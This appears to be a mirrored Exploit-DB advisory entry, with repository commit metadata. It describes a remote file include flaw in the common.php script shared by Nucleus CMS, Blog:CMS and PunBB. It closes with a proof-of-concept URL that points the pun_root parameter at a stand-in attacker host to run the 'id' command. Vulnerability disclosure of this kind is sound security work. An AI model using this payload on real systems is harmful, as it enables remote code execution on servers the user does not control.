exploit-db-mirror/exploits/php/webapps/24296.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

9 lines
No EOL
516 B
Text

source: https://www.securityfocus.com/bid/10760/info
Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.
Input passed to the 'common.php' script is not sufficiently sanitized.
All three applications are vulnerable because they have a similar or identical code base.
http://www.example.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id